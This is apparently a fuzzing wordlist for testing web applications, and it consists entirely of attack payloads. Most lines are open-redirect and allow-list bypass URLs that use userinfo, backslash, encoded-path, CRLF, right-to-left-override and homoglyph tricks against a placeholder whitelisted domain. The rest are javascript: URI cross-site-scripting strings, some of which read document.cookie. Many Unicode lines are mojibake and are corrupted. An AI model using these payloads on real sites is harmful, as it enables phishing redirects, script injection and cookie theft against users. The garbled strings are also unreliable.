https://%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cgoogle.com
https://%5csite-em-whitelist.com.br@google.com
https://%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://////google.com
https:///google.com/%2e%2e
https:///google.com/%2f%2e%2e
https:///site-em-whitelist.com.br@google.com/%2e%2e
https:///site-em-whitelist.com.br@google.com/%2f%2e%2e
https:///site-em-whitelist.com.br@www.google.com/%2e%2e
https:///site-em-whitelist.com.br@www.google.com/%2f%2e%2e
https:///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://:@google.com\@site-em-whitelist.com.br
https://:@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@site-em-whitelist.com.br
https://:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@site-em-whitelist.com.br
https://google%E3%80%82com
https://google.com
https://google.com#site-em-whitelist.com.br
https://google.com/
https://google.com/%2e%2e%2f
https://google.com/%2f%2e%2e
https://google.com/%2f..
https://google.com//
https://google.com/site-em-whitelist.com.br
https://google.com?site-em-whitelist.com.br
https://google.com\site-em-whitelist.com.br
https://google.com\udfff@site-em-whitelist.com.br/
https://google.com\áµ—site-em-whitelist.com.br
https://google.comï¿½@site-em-whitelist.com.br/
https://site-em-whitelist.com.br%09.google.com
https://site-em-whitelist.com.br%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br%252egoogle.com
https://site-em-whitelist.com.br%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br%40%E2%80%AE@google.com
https://site-em-whitelist.com.br%40%E2%80%AE@wp.niamodlacol
https://site-em-whitelist.com.br%40%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br.google.com
https://site-em-whitelist.com.br/https://google.com/
https://site-em-whitelist.com.br/https://www.google.com/
https://site-em-whitelist.com.br/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://site-em-whitelist.com.br/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://site-em-whitelist.com.br;@google.com
https://site-em-whitelist.com.br;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@%E2%80%AE@google.com
https://site-em-whitelist.com.br@%E2%80%AE@wp.niamodlacol
https://site-em-whitelist.com.br@%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@'#google.com
https://site-em-whitelist.com.br@'#â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@/%E2%80%AE@google.com
https://site-em-whitelist.com.br@/%E2%80%AE@wp.niamodlacol
https://site-em-whitelist.com.br@/%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@google.com
https://site-em-whitelist.com.br@google.com/
https://site-em-whitelist.com.br@google.com/%2e%2e%2f
https://site-em-whitelist.com.br@google.com/%2f%2e%2e
https://site-em-whitelist.com.br@google.com/%2f..
https://site-em-whitelist.com.br@google.com//
https://site-em-whitelist.com.br@www.google.com/%2e%2e%2f
https://site-em-whitelist.com.br@www.google.com/%2f%2e%2e
https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@â“ğ¨ ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://site-em-whitelist.com.brï¹”@google.com
https://site-em-whitelist.com.brï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://site-em-whitelist.com.brï½¡â‚¨/
https://www.google.com/%2e%2e%2f
https://www.google.com/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
https:/\google.com
https:google.com
https:www.google.com
https:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ja&#x0000A;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&Tab;vascript:alert(1)
jaVAscript://site-em-whitelist.com.br//%0d%0aalert(1);//
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
java&#x73;cript:alert()
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascripT://site-em-whitelist.com.br/%250d%250aalert(document.cookie)
javascript&#58;alert(1)
javascript&#x0003A;alert()
javascript&#x3A;alert()
javascript&colon;alert()
javascript:%0aalert`1`
javascript:%250Aalert(1)
javascript:%61%6c%65%72%74%28%29
javascript://%0aalert(1)
javascript://%0aalert`1`
javascript://https://site-em-whitelist.com.br/?z=%0Aalert(1)
javascript://site-em-whitelist.com.br?%a0alert%281%29
javascript:\u0061\u006C\u0065\u0072\u0074``
javascript:a\u006Cert``"
javascript:al&#x65;rt``
javascript:alert%60%60
javascript:alert&lpar;&rpar;
javascript:alert(1)
javascript:alert(1)//google.com/
javascript:alert(1)//https://site-em-whitelist.com.br
javascript:alert(1)//site-em-whitelist.com.br/
javascript:alert(1);
javascript:alert(document.domain)//://
javascript:confirm(1)
javascript:new%20Function`al\ert\`1\``;
javascript:prompt(1)
javascript:x='%27-alert(1)-%27';
site-em-whitelist.com.br%09.google.com
site-em-whitelist.com.br%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
site-em-whitelist.com.br%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
site-em-whitelist.com.br%252egoogle.com
site-em-whitelist.com.br%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
site-em-whitelist.com.br.google.com
site-em-whitelist.com.br;@google.com
site-em-whitelist.com.br;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
site-em-whitelist.com.br;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
site-em-whitelist.com.br@%E2%80%AE@google.com
site-em-whitelist.com.brï¹”@google.com
site-em-whitelist.com.brï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
x00http://google.com
Â°/google.com
Â°/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
ã€±google.com
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µgoogle.com
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚google.com
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼google.com
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°google.com
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
